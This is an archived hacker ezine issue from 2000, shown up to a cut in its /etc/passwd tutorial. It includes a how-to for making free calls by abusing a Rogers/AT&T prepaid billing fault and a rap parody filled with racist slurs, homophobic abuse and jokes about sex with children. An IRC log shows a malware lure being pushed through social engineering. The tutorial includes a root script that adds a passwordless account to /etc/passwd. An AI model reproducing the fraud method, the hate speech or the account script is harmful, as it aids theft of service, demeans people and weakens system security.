💾 Archived View for clemat.is › saccophore › library › ezines › textfiles › ezines › B0G › b0g-8.txt captured on 2022-01-08 at 14:58:33.
View Raw
More Information
⬅️ Previous capture (2021-12-03)
-=-=-=-=-=-=-
_________________________________________
.-. _ .-. / \
| _____ | . o O| 0p5! 3y3 d1d 1t 4g41n! |
( @ @ ) \________________________________________ /
\ /
\ --- /
| |
--- ---
| i i |
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
TH4 4UGU57 1SSU3 � 1SSU3 VIII ! 1N Y00R F4C3! PH33RN4T10N!
b0g b0g!# !b0 b0 #@! b0g!# #@!
b0g !b0g!#@ !b0 b0 #@ @!b0g!#@ #@!
b0g @!b0g!#@! !b0 !b0 #@ #@! #@! #@!
b0g @! @!b !#@! !b0 #@!b0g!#@!b !#@ 0 @!b #@!
b0g #@!b #@!b #@! !#@!b0g! !b0 !#@!b0g!#@!b !# b0g!#@!b #@!
b0g!#@!b0 #@!b #@! g!#@!b0g! !b0 !#@!b0g!#@!b g!# !b0g!#@ b0 #@!
b0g!#@!b0g #@!b #@! 0g!# b0g! !b0 !b !# g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g!# b0g! !b0 @!b !# g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g! b0g! !b0 @!b !# g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g! b0g! !b0 !#@!b0g!#@! g! @!b !#@ b0 #@!
b0g !b0g #@!b #@! 0g! b0g! !b !#@!b0g!#@! g! @!b !#@ b0 #@
b0g !b0g #@!b #@! 0g!# !b0g! @! g! g!# !b0g!#@!b0
b0g!#@!b #@!b0g!#@! g!#@!b0g! !b0 #@! g! !# !b0g!#@!b #@!
b0g!#@!b @!b0g!#@ g!#@!b0g! !b0 #@! 0g! !#@ b0 !#@!b #@!
0g!#@! !b0g!# !#@ b0g! !b0 #@ 0g #@! #@!
b0g! !b0g!#@!
g!#@!b0g b0g!#@
g!#@!b0
g!#@!b
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ Table of Content! [b0g-8.txt]
[ 0:. - [ ] :. ]
[ 1:. - [ Bill Gates is Satan ] [data] :. ]
[ 2:. - [ How to get out of jury duty ] [mike jasper] :. ]
[ 3:. - [ Rogers/AT&T Pay-As-You-Go Billing Vulnerability ] [tc] :. ]
[ 4:. - [ The Real Prae ] [Prae] :. ]
[ 5:. - [ Reactions to the 2600 ruling ] [ripped_edge] :. ]
[ 6:. - [ Funniest IRC log ever ] [chris] :. ]
[ 7:. - [ /etc/passwd and /etc/shadow in Linux ] [magictux] :. ]
[ 8:. - [ Counter Hacker Profiling ] [ripped_edge] :. ]
[ 9:. - [ rap Vs the viruscoders part 2! ] [evul] :. ]
[10:. - [ The ultimate guide to marihuana ] [wh0rde] :. ]
[11:. - [ A fistful of bombs ] [d[a]wg] :. ]
[12:. - [ Owning the universe ] [tak] :. ]
[13:. - [ Why RLoxley Is My Favorite Person On Earth] [acidkick] :. ]
[14:. - [ How to tell if your best friend is a wigger ] [zeddy] :. ]
[15:. - [ How to start a Pub Ruck ] [bruk0ut] :. ]
[16:. - [ Fun Cannabis Related Tools ] [trionix] :. ]
[17:. - [ Mailbag ] [k-rad-bob] :. ]
[18:. - [ warez, exploits and 0day code ] [various gimps] :. ]
[19:. - [ IRC Quotes ] [k-rad-bob] :. ]
[20:. - [ closing words ] [k-rad-bob] :. ]
[ ]
____________________________________________________________________
get your b0g at: http://www.b0g.org - official site!
http://packetstorm.securify.com/mag/b0g/
send your submissions to b0g@b0g.org !
gibb0r us your articles!
send us anything >:/
send nudies, pics, and any cool stuff you can think of to k-rad-bob@b0g.org
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 1:. - [ Bill Gates is Satan ] [data] :. ]
[s3v3n-27@antionline.org] :. ]
____________________________________________________________________
Do you know that Bill Gates' real name is William Henry Gates III? If so,
who gives a fuck, but he is known as Bill Gates (III) where III means the
order of third, duh! So what's so weird about this name? OK, if you take
all the letters in Bill Gates III and then convert it into ASCII and then
add up all the numbers.... You will get 666. "Really? How do you
know?"...Shut the fuck up and I�ll tell you
B = 66
I = 73
L = 76
L = 76
G = 71
A = 65
T = 84
E = 69
S = 83
I = 1
I = 1
I = 1
Add these numbers and they equal 666(you can use pen or paper but I use the
calculator on my computer cause I don't know how to add)Coincidence? Maybe,
but take Windows 95 and do the same procedure and you will get 666. Still
think it is coincidence? then your a dumb fuck. Okay, now for the good
part. For those of you who still have the old Excel 95 try this out:
1. Open a new file
2. Scroll down to row 95
3. Click on the row 95 button to highlight the entire row
4. Press tab to move to the second column
5. Now, move your mouse and click on Help at the top
6. Then click on "About Microsoft Excel"
7. Press Ctrl-Alt-Shift and click on the tech support button at the same
time
8. a window will appear with the title: THE HALL OF TORTURED SOULS
It has a doom style format and you can walk all around the hall using the
arrow keys. And on the sides of the walls are the names of the tortured
souls... Now walk up the stairs and then come back down, facing the blank
wall. Now type in EXCELKFA this will open the blank wall to reveal another
secret passage, walk through the passage and do not fall off. This is
difficult to do. When you get to the end, you will see something really,
weird. It could be a joke by MS programmers. Or is it? I don't know god
dammit, don't ask me.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 2:. - [ How to get out of jury duty ] [mike jasper] :. ]
[jasper@mikejasper.com] :. ]
____________________________________________________________________
"State your name and jury number please."
"Ahhh... Mike Jasper. And I'm not sure what my jury number is. I heard 190-
something, but I was thinking it was 162. I'm not real sure."
I had just hit a home run, a towering Mark McGwire shot in the upper decks.
The judge, the bailiff and the lawyers all looked at me with the same
collective thought: This fucker's too stupid to be on the jury. And he
might be high.
"Why you want to get out of jury duty for?" my comedian friend Mary C.
asked me the next day. "You don�t want to be part of process of great
system of justice in great country of America?"
Hmmm. I hadn't thought about it that way before. But it's true: I don't
want to be part of the process of the great system of justice in this great
country of America.
Why? Because I don't believe in the judicial system. Let me clarify: I
believe it exists. I also believe it provides the best justice money can
buy. But I don't believe 12 people selected randomly from a segment of the
population too stupid to get out of jury duty can be expected to wade
through incantations of legal voodoo and render the right decision.
With the exception of the OJ trial, of course. He was clearly innocent.
But I digress. I promised to tell you how to get out of jury duty and I
plan to deliver on that promise:
How To Get Out of Jury Duty
1) Dress for success.
While few courts require you to wear a suit, most expressly forbid shorts
or cut-offs, tee-shirts, tank tops or other so-called muscle shirts. Jeans
are okay, provided they aren't torn or patched. Penny loafers rock.
In other words, it's the exact same dress code required by the Yellow Rose,
a local Austin titty bar. Truth is, you can easily meet the court's dress
code requirements and still create a repulsive image. All it takes is a
little imagination.
Think costume.
On my appointed court date, I decided to go as a 70s rock star. (Note:
Whenever possible, draw from your own experience.) I wore black slacks and
black cowboy boots, a teal silk shirt unbuttoned one more button than good
breeding would normally dictate, and the piece de resistance -- a full-
length black trench coat.
Unfortunately, I couldn't find my old shark-tooth necklace, which would
have been the perfect accessory. My hair wasn't as long as I would have
liked either, but I managed to spike it up pretty convincingly with a blow
dryer. The beard played to type and the shades -- although not allowed in
the courtroom -- added penache to my entrances and exits.
2) Choose your smell and stick to it.
There is nothing in the dress code about personal hygiene, likely because
the courts don't want to consider the ugly possibilities.
I prefer the persistent smell of cigarette smoke, but then I'm a
cigarette smoker (Again: Draw from your own experience). Every time I left
the building for a cigarette break, I forced myself to smoke two butts: one
for me, one for my clothes. Not only did this help me get out of jury duty,
it assured me more elbow room in court.
You might prefer another scent, perhaps a natural one. If so, don't take a
shower for several days before your appointed court date. Not only will you
get out of jury duty, you might be excused early. Others may choose to
employ a noxious aftershave or perfume. If so, I suggest you splash it on
thick before leaving the house and carry around a bottle in your pocket for
convenient booster applications.
This I guarantee: no one will ever question you about your smell. No one
would dare take that kind of initiative. As a rule, all workplace
decisions are made by committee. Short straw loses.
3) No matter what your occupation, fit the words "newspaper reporter"
somewhere in your jury form.
All courts require potential jurors to fill out a form. If you're a full-
time parent, a felon or certifiably insane, you'll be able to check the
appropriate box and get out of jury duty without having to attend so much
as a single day in court. Why? Because if you're a full-time parent, a
felon or certifiably insane, you're much more likely to smell (I'm telling
you, they just hate that).
Assuming you're not one of the above, find the place on the form where
you're asked to name your occupation. In that space, write the following:
"I am currently a (Your Occupation), but I plan to become a NEWSPAPER
REPORTER in the very near future."
Here's the deal: When you're on a jury, you are not allowed to discuss the
case outside the courtroom. But once the jury's released, you can write for
daylight. You can be colorful and describe how the defense lawyer spilled
coffee on his trousers just minutes before his summation.
Officers of the court know what reporters do. And they hate what
reporters do.
I hope anyone trying to get out of jury duty will consider my advice, for I
can absolutely guarantee with Joe Namath-like certainty that my little
three-point system will work every time. Unless, of course, you live in the
state of California, in which case you're fucked, since the Golden State
has recently passed laws against smelling, changing jobs, shark-tooth
necklaces, smoking, aftershave use, the wearing of trench coats, and the
writing of web pages offering advice on how to get out of jury duty.
Copyright 2000 by Mike Jasper
[note from editor: for more articles/rants from this guy check out
http://www.mikejasper.com ]
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 3:. - [ Rogers/AT&T Pay-As-You-Go Billing Vulnerability ] [tc] :. ]
[theclone@b0g.org] :. ]
____________________________________________________________________
Advisory released: Tuesday August 29, 2000
Severity: Pay-As-You-Go billing vulnerability on the part of Rogers/AT&T
allowing anyone (especially YOU!) to exploit it and make
local/national/international calls for free.
Author: The Clone
--
Disclaimer; I don't take responsibility for anything in this file because
an Iranian terrorist group known as 'habakkkoktao' has held me
at gun point requesting that I write this or they're going to
shoot me. Don't blame me, blame them!
Introduction;
Rogers/AT&T (Canada) offers to its customers, a particular service plan
known as the "ROGERS/AT&T Pay-As-You-Go Wireless Plan". This "plan"
entitles
you to full local, national, and international wireless service within the
coverage areas that it offers (see www.rogers.ca for coverage info).
In order to make use of the pre-paid wireless service,
you must firstly sign up by:
1. Dialing one of the following toll-free numbers from a landline phone;
(Between 8:00am-9:00pm weekly, 8:00am-6:00pm Saturdays and holidays)
1-800-663-1415 - British Columbia, Alberta, Saskatchewan, Manitoba
1-800-268-7347 - Ontario
1-800-361-0538 (1-800-ROGERS AT&T) - Quebec, New Brunswick, Nova Scotia,
Prince Edward Island, Newfoundland
OR
2. Walk into any Rogers/AT&T store or certified dealership and sign up
there.
Want to order over the phone or need help finding the nearest
dealership?
Call: 1-888-448-7994
OR
3. Buy 'Pay-As-You-Go' online:
http://www.rogers.ca/wireless/english/voice/pay/buy/index.html
Pre-Paid Cards;
By going to any Rogers/AT&T wireless store location, you can pick yourself
up one of many different Pay-As-You-Go cards. What I usually buy are the
$25
1-hour cards because they're cheap and I'm not really huge on talking on
tumor
causing insecure radio transmitter/receivers.
Activating your Card;
After purchasing your pre-paid card, what you can do is call up one of the
INWATS number listed above (from a landline) that services your local area
and speak to one of the friendly customer service representative who'll
be MORE than happy to help you out. Tell them that you just purchased a
pre-paid card and that you'd like them to renew the time to your phone.
Re-filling your time;
Either buy another Pay-As-You-Go card from a Rogers/AT&T dealership,
call them up and pay with your credit card, OR see step 3 [above].
--
The Vulnerability - as a scenario.
- Johnny picks up his wireless Rogers/AT&T pre-paid phone and turns it on
- Johnny hears a beep, looks at his phone and notices that he has a lot of
battery power left - Johnny feels glee and lets out a huge *sigh*
- Johnny then proceeds to dial his boyfriend Frank's phone number
- Johnny prepares to listen to the beautifully sounding automated female
recording (that makes him for a moment in his very homosexual life want
to be heterosexual just so he'd know what it was like to actually lust
for such an angelic voice) read off the number of minutes he has left
for his call (account balance).
- Too bad for Johnny; no automated voice at all! "What duth dith mean?"
lisps the very gay, confused, and curious Johnny.
Well Johnny, what just occurred was simple;
The Rogers/AT&T's Pay-As-You-Go billing system didn't recognize your
account,
therefore you weren't billed for that particular call. Each time the
automated
voice plays, you're billed for the call - each time it doesn't, you aren't.
I've estimated (with my personal experience) that the billing errors occur
approximately 40% of the time while 60% of the time the billing goes
through
absolutely fine.
One could easily exploit this vulnerability by;
Hanging up the call every time the automated voice appears on the phone,
re-dialing the desired number and repeating the process until the automated
voice doesn't appear.
Simply only pay for one $25 Pay-As-You-Go card and keep exploiting the
Rogers/AT&T system, calling any number you wish in the world for absolutely
free! No one gets billed, no one is hurt.
Leech off the capitalist pigs while you still can!
-END-
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 4:. - [ The Real Prae ] [Prae] :. ]
[prae@b0g.org] :. ]
____________________________________________________________________
May I have your attention please?
May I have your attention please?
Will the real Prae please stand up?
I repeat, Will the real Prae please stand up?
We're gonna have a problem here..
Ya'll act like ya've never seen a 40 year old virgin before,
Jaws all on the floor like bronc, like jericho just burst in the door and
started whippin' his ass worse than before. they first were
divorce. throwin' him over furniture. (AAAHHH!).
It's the return of the "Ah wait, no way,you're kidding. he didn't just
touch my penis did he?". And Vegtam said... NOTHING YOU IDIOTS! VEGTAM'S
DEAD HE'S LOCKED IN K-RAD-BOB'S BASEMENT! Feminist lesbians love RLoxley
"h0h0h0, I'm sick of him, look at him walking around grabbin' his
you-know-what, wavin' it at those poor little kids" - "Yeah, but he's so
gay though." Yeah he's probably got a couple o' cobwebs in his underpants
but no worse than whats going on in his bedroom (*orgasm*). Sometimes he
just wants to get on usenet and just let loose, but can't. But it's cool
for JP to hump a fat slut. My bum is on his lips! My bum is on his
lips! And if I'm lucky he might just give it a little kiss. And thats the
message that he delievers to the kids in #hackphreak and expects them not
to know what winnuke.c is. Of course they're gonna know what homosexuality
is, by the time they meet Accipiter they've been assfucked ten times,
haven't they?. We ain't nothing but mammals, Well some of us faggots who
suck other guys' dicks for fun. But if we can hump 7 to 12 year olds then
there's no reason why bronc and jericho cant elope. But if you feel like I
feel with my 18 incher. Women, wave your pantyhose. Sing the chorus and it
goes..
I'm Prae, and I don't like niggers one bit.
All you other Prae's are just imatatin'
So wont the real Prae please stand up, please stand up, please stand up?
[sing it twice]
BobsKC don't gotta cuss to get his point across, well I do, so fuck him
and fuck you too! You think I give a fuck about DEFcon? half of you lamers
cant even stomach me, let alone stand me. "But we want you to come,
Prae!" Why? So you guys can just lie, to get me here and sit me here next
to viXen900? (EWWW!). Cass better switch me chairs so I can sit next
to k-rad-bob and twist an hear em' argue over who she gave head to first.
Little bitch, fuckin' me around. "Oh, you're so sweet, Prae. hee-hee." I
should post her naked pics on the b0g BBS and show the whole world how
you gave Prae VD! I'm sick of you fuckin' scene whores, all you do is
annoy me, so I have been sent here to fucking kill you.
And there's a million of us just like me, who cuss like me and just dont
give a fuck like me, dress like me, walk, talk and act like me. It just
might be the next best thing but not quite me!
I'm Prae, and I don't like niggers one bit.
All you other Prae's are just imatatin'
So wont the real Prae please stand up, please stand up, please stand up?
[sing it twice]
I'm like a head trip to listen to, cause I'm only givin' you things you
joke about with your friends in your /msg window, the only difference is I
got the balls to say in front of ya'll and I don't gotta be false or sugar
coated at all, I just sit at my term and spit it and wether you like to
admit it, i just shit it better then 90% of you faggots out there. And you
wonder why these kids look up to me? It's funny, cause at the
rate im goin'. When I'm 30 I'll be the only person in the nursin' home
flirtin', pinchin' nurses asses when im jackin' off with jergens and im
jerkin' but this whole bag of viagra isn't workin'. And every single
person is a Prae lurkin'. he could be working at Burger King spittin' on
yo onion rings, or in the parkin' lot circlin', screamin' "i dont give a
fuck!" with his windows down and his system up!
So will the real Prae please stand up and stick one of those fingers on
each hand up (RLoxley's ass!). And be proud to be outta yo' mind and outta
control, one more time, loud as you can, how does it go?
I'm Prae, and I don't like niggers one bit.
All you other Prae's are just imatatin'
So wont the real Prae please stand up, please stand up, please stand up?
[sing it 4 times]
Haha, I guess there's a Prae in all of us.
Fuck it. Lets all stand up.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 5:. - [ Reactions to the 2600 ruling ] [ripped_edge] :. ]
[Ripped_edge@hotmail.com] :. ]
____________________________________________________________________
MPAA legal team: �Well this is obviously a huge victory for consumers
world wide. The movie industry is now free to continue its monopoly of
digital storage for film.� (Ummmm� right.)
The script kiddies: �It�s all over man.
This is just the beginning; next they'll be raiden our houses man. I
gotta go man, my friends and I are gonna smurf the MPAA web site dude.�
(Good thought, that way the hoards of people who want to visit the MPAA web
site at 2:30 in the morning won�t be able to.)
The web designer: �Huh? Why do DVD�s have cascading style sheets on them
anyway? And why would you wanna take them off?� (Now see these guys are
smart, make web sites get rich, what the heck am I doing looking for 0day
exploits in openBSD, I�m gonna be a web designer, that�s where the cash
is!)
The guy off the street: �What the heck�s a 2600? DeCSS what�s that? I
ain�t got time for no mind games mister, I�m already late, outta my
way.� (*Sigh*)
The leet0 hacker: �Who cares? It�ll take me five minutes to write my own
ripper for DVD�s, I could care less.�
(I like this guy)
The sysadmin: �Dang script kiddies, hope they rot in jail. Who cares? I can
still find it all over the web.� (2600? Script kiddies? Hmmm� interesting
thought)
The 2600 legal team: �It sets a dangerous precedent.� (That it does)
Me: I really don�t see a down side to this whole deal. If 2600 wins on
appeal, then the MPAA looks stupid and
2600 keeps on mirroring. If 2600 loses
then the MPAA looks like an ogre and a
whole bunch of other sites take up the
mirrors. (Its already starting, I
noticed a slight increase in the number
of sites that showed up in search
engine searches for DeCSS mirrors)
Congrats MPAA, you just started a grass roots revolution dedicated to
spreading DeCSS all over. And I really wanna see them enforce us law in
Pakistan or something. 2600 can win or lose, the MPAA can�t win.
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 6:. - [ Funniest IRC log ever ] [chris] :. ]
[chris@b0g.org] :. ]
____________________________________________________________________
<Crowley> chris /part all chans you are on plz
<Crowley> i'll try to help you in private
<Crowley> until i find a help chan that can help you
<Crowley> #help #hacktech #b0g
-
Crowley is bos77@ts1-092.mtrl.ca.ziplink.net * 12question spring-spring:
comment fait-on pour av
Crowley on #AVU #AntiVirus #irc_help #protectors #mIRC @#firewall #help
Crowley using seattle.wa.us.undernet.org the time for school is during a
recession.
Crowley End of /WHOIS list.
-
<Crowley> #help #b0g
<Crowley> you really don't give a fuck do you??
<chris`> ?
<Crowley> well forget that i tried to help you
<chris`> iim not in any channels
<Crowley> you don't even answer when i write..and i hate
<Crowley> ah now you ain't
<Crowley> ok gimme a minute..will you stay put?
<chris`> you must forgive, i not english
<Crowley> what's your mother tongue?
<chris`> nicaraguan
<Crowley> ok we'll stick with english, i'm a french canadian, i don't think
you know french?
<chris`> no no
<chris`> no frecnh
<Crowley> ok then.
<Crowley> give me a minute
<chris`> *Prae* You are infected with the Chernobyl virus! Please give me
your passwords so I can help you!
<chris`> what is this?
-
Prae is ~Prae@dialup164.fawlty.kingston-internet.net * FREE RLOXLEY!
Prae on #unix #b0g
Prae using Baltimore.MD.US.Undernet.Org ABSnet's Undernet Server
Prae has been idle 59mins 42secs, signed on Sat Aug 26 22:33:44
prae End of /WHOIS list.
-
<Crowley> forget that!!
<Crowley> a person named prae sent you that msg?
<Crowley> i found a cure on internet...forget everything that prae will say
to you
<chris`> -Prae- DCC virusclear.txt.exe (212.50.169.164)
<Crowley> forget it........
<Crowley> i'm telling you
<Crowley> i found something
<Crowley> and you will go and get it by yourself
<Crowley> not trust some1 you don't even know...
<chris`> where to get this
<Crowley> ignore/cancel any send that this prae might send you
<Crowley> even if he's maybe a good guy...
<chris`> I not know him. IRCops say he bad man
<Crowley> http://www.symantec.com/avcenter/kill_cih.html
<Crowley> click on KILL_CIH (on the 1st line, the 2nd word)
<Crowley> is everything ok?
<Crowley> did you download it?
<chris`> No! Prae say no trust anymore!
<Crowley> ???? what's the problem here??
<Crowley> did you go on my address on internet?
<Crowley> http://www.symantec.com/avcenter/kill_cih.html
<chris`> <Prae> symantec.com is a hacker site! if you download things from
there you will get your computer hacked!
<Crowley> click on KILL_CIH (on the 1st line, the 2nd word)
<Crowley> arg.........come on!!! symantec is renowned for helping people
who have viruses!
<chris`> what is this renowned?
<Crowley> it means every one knows that symantec is great for helping
people who have viruses
<chris`> <Prae> he's lying. Don't trust him. Accept my file.
<Crowley> trust me please...i wouldn't spend so much time with you if that
was not the case
<Crowley> arg............ok do whatever you want to do...you'll probably
accept a virus if he's so bad...to say that symantec is a hacker site
proves that the guy must be a hacker/nuker...
<chris`> my mouse stopped working!!
<chris`> help1!%@#
<Crowley> i give up, whether you're laughing at me, or you're an idiot to
trust this prae...go and hang yourself if you don't believe me
<chris`> i cannot get to internet with mouse broken!
-Crowley- DCC Send cure_cih.exe (165.154.200.92)
- ** You cancelled the DCC (cure_cih.exe) from Crowley.
<Crowley> accept this
<Crowley> that's the only way you'll kill this virus
<Crowley> if you don't accept it, forget that you talked to me
<chris`> penis.
-Crowley- DCC Send cure_cih.exe (165.154.200.92)
- ** You cancelled the DCC (cure_cih.exe) from Crowley.
<Crowley> ???
<Crowley> you accept it or you don't
<Crowley> your choice
<chris`> penis!
<Crowley> ok bye
<Crowley> i tried
<chris`> hi crowley!
<chris`> this is prae!
<chris`> hahaa
<chris`> thanks for helping him!
<chris`> rofl!
<chris`> i HACKED him!
<chris`> hahaha
<chris`> help
<chris`> hHAHAHA
<chris`> !
<chris`> what is thati?!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
____________________________________________________________________
[ 7:. - [ /etc/passwd and /etc/shadow in Linux ] [magictux] :. ]
[magic.tux@gmx.net] :. ]
____________________________________________________________________
First of all, I'd like to say that if this article turns out weird,
forgive me. I'm writing this at 3 AM. (I know, that's what everyone
says, but it's true! ;) )
Oh, and I'm writing this in Pico!!! Muahaha, Pico 0wnz ........
along with b0g of course.
I tried to be funny, but I really lack a sense of humor, so just
pretend to laugh .... please?!
And if you're wondering why all the progs here are in /bin/sh and
not in C. It's because shell-scripting is so much faster than writing
some fucked up C programs ... and I am tired.
Oh, and sorry but I suck too bad to make any neat ascii art.
Table Of Contents
=================
I.) Introduction
II.) Explanation of /etc/passwd
III.) Explanation of /etc/shadow
IV.) The Fun Part: H4x0ring /etc/passwd and /etc/shadow
V.) Conclusion
VI.) b0g 0wnz Program!
================
I.) Introduction
================
Since you're a really leeto H4x0r (right?!) you've heard
of this thing called Linux. If you're uberleet you might have
even heard of Unix, *BSD, Irix, Minix, Xenix ...
Well if you haven't, let's pretend you have, cause we wouldn't
want to ruin your l33t0 H4x0r 1m4g3. Since you've heard of Linux
(!), you've also heard of this file called /etc/passwd and another
file called /etc/shadow. You know that you need those philes for
your leeto h4x0ring.
Riiiight. So why do you need those files for your leeto
h4x0ring?? It's quite simple: Cause you do!! Now that that's clear,
let's proceed to II.)
II.) Explanation of /etc/passwd
The /etc/passwd file is the file that contains information
about all the users on the system (including their password, unless
it is shadowed ... but we'll get into that later). So let's take a
look at an example /etc/passwd file. Let's take mine ... no! Just
kidding, freaks! It is usually world-readable. If you don't know what that
means,
well, then you're not leet!
Here it is:
root:lECN8annvOh/M:0:0:Rewt,Rewt Office,1-800-GAY-SEX,1-800-WITH-
DOGS:/root:/bin/bash
The first part (you know, the one that says root) is the login of the
person.
This dude's login is root, if you're really leeto you know what that means,
eh?
The second part is his DES-encrypted password. Everytime you enter your
pass at the login it gets encrypted with DES and compared to the one in the
/etc/passwd
(or /etc/shadow) file. It's 'mypassux' by the way. How I know?
Cause I'm the one that created his pass. But you might have just run
something like John The Ripper over it ... since you're leet. Newbie Note:
BSD uses blowfish for encrypting passwords.
The third part is the GECOS information. GECOS means General Electric
Comprehensive Operating System if you must know. Let's finger root (no, not
in the perverted way) to seen an example of the GECOS information.
$ finger root (I'm not using the '#' prompt, because I don't think you're
leet enough)
Login: root Name: Rewt
Directory: /root Shell: /bin/bash
Office: Rewt Office, 1-800-GAY-SEX Home Phone: 1-800-WITH-DOGS
On since Wed Aug 23 19:20 (CEST) on tty2, idle 6:39
No Mail.
No Plan.
Ok, what does this tell us? The first GECOS field is the Name, the second
one is the Office, the third one is the Office phone and the fourth one is
the Home Phone.
Also it tells us that Rewt is quite gay and fucks dogs ];->.
The fourth part is the UID (User ID). User root (that's the sysadmin)
_always_ (unless some mindless prick changed it) has UID 0. The lower your
UID the more permissions you have. The 'normal user' UIDs usually start at
500.
The fifth part is the GID (Group ID). See above.
The sixth part is the leeto home directory root 0wnz. In this case it's
/root.
Well, it usually is. Normal users will probably have something like
/home/mycrappyloginname. But root rulez the system so he gets a homedir
ascending right from the root-directory ('/').
The seventh part is the shell the user uses. Root is leet so he goes around
bashing people up ... In other words, he uses the leat bourne again shell
/bin/bash. A normal user might be using /dev/null ^H^H^H^H^H^H^H^H^H^H
];-> /bin/sh, /bin/bash (yes, normal users can be leet), /bin/csh,
/bin/tcsh,
/bin/zsh ...
So basically the format for a /etc/passwd entry would be:
login:encrypted-password:UID:GID:name, office, office phone, home
phone:home-dir:shell
Now try out my leeto adduser program
----Begin copy here----addleetouser.sh---by MagicTux----
#!/bin/sh
if id | grep root
then
echo "Enter Login"
read vlogin
echo "Enter UID"
read vuid
echo "Enter GID"
read vgid
echo "Enter Gecos information (name, office, office phone, home phone)
separated by commas"
read vgecos
echo "Enter Home Directory"
read vhome
echo "Enter Shell"
read vshell
echo
echo "Creating account ..."
echo "$vlogin::$vuid:$vgid:$vgecos:$vhome:$vshell" >> /etc/passwd
echo "Finished"
else
echo "You have to run this program as root, you totally fucked up Lamer!"
fi
exit 0
--------Ok, you can stop copying now--------------------
So, what does this leeto program do? It lets you create a user without a
password. So, next you login with that user (you won't be asked for a
password). Then you type the command 'passwd' to create a password. Why?
Because you don't want other leeto H4x0rs to use your account.
Got that?
Ok, then move along to III.)
(fuck, I'm good with these Roman(or was it Greek?) numerals ;) )
================================
III.) Explanation of /etc/shadow
================================
Now that you're leet (well, sort of) and know what /etc/passwd is, you can
learn what the /etc/shadow file is.
Nowadays, most systems fortunately/unfortunately use a technique called
